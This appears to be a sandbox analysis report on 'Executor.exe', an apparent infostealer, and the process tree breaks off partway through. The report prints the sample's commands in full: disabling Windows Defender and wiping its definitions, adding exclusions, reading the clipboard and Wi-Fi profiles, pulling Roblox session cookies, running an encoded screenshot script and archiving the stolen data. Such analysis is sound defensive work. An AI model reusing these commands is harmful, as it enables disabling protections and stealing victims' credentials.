Analysis

  • max time kernel
    104s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 02:21

General

  • Target

    Executor.exe

  • Size

    7.8MB

  • MD5

    4c0ea214e6c5c748c3c6c8cef46f3f6b

  • SHA1

    151345ef0999e6427d8d1fd710be68726eb4c7df

  • SHA256

    d7fd9ff322926d3ca000e0a0ce63ee569ca5fd0c662f86fe9e38ef449556c8c0

  • SHA512

    38ab12a1fcfea790887b4cf4992388eb5160fd3d5753f25a9b46bf946eb6abdfaa86ed335e26254a0793fd3f7d4759e9cf80acaf380473be478348bfaee3bcbb

  • SSDEEP

    196608:8WwHUOXXKAp+2kj9fZwQRCgiIKpdzjPOan7j2y283TOnOZ:yxDww8wIKppDO9iZ

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 55 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Executor.exe
    "C:\Users\Admin\AppData\Local\Temp\Executor.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Users\Admin\AppData\Local\Temp\Executor.exe
      "C:\Users\Admin\AppData\Local\Temp\Executor.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Executor.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Executor.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5764
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3068
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('dont run more than 1 time', 0, 'disable antivirus', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4672
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('dont run more than 1 time', 0, 'disable antivirus', 32+16);close()"
          4⤵
            PID:4960
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1396
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4920
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2028
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5880
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:5308
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3652
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:4396
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1556
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:2708
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3576
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:2944
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3136
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1300
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3200
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:936
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5672
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2844
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:5296
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:5340
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  PID:4060
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1980
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:1596
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:5960
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3064
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:380
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2952
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:4364
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:4456
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:728
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:2980
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:3376
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:5552
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1964
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h201rnc3\h201rnc3.cmdline"
                                    5⤵
                                      PID:4808
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C92.tmp" "c:\Users\Admin\AppData\Local\Temp\h201rnc3\CSC73EDC455FEB747C083E36FBE9325B447.TMP"
                                        6⤵
                                          PID:4716
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4804
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:2016
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:4932
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:2648
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2812
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:6140
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:4948
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:3228
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:5040
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:456
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:4464
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:5880
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:5600
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:3652
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:5024
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:4840
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:4056
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3656
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:4504
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4420
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                  3⤵
                                                                    PID:5648
                                                                    • C:\Windows\system32\getmac.exe
                                                                      getmac
                                                                      4⤵
                                                                        PID:5192
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31762\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\s8TKh.zip" *"
                                                                      3⤵
                                                                        PID:4848
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI31762\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI31762\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\s8TKh.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:4868
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:1408
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic os get Caption
                                                                            4⤵
                                                                              PID:5392
                                                                          • C:\Windows\system32\cmd.exe
